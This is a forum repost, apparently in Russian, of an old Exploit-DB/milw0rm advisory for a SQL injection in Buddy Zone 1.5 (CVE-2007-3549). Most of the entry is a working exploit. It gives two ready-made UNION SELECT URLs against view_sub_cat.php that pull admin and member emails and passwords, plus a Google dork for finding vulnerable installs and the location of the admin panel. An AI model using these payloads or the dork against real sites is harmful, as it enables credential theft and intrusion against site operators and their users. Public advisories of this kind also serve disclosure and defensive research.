- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4127
- Проверка EDB
-
- Пройдено
- Автор
- T0PP8UZZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3549
- Дата публикации
- 2007-06-29
Код:
--==+================================================================================+==--
--==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://www.vastal.com/buddy-zone-social-networking-script.html
DORK: allintext:"Powered By Buddy Zone"
DESCRIPTION:
Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts.
EXPLOITS:
http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*
http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*
Tip/Note:
The Administrator's Panel is in /admin/.
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps !
--==+================================================================================+==--
--==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2007-06-29]
- Источник
- www.exploit-db.com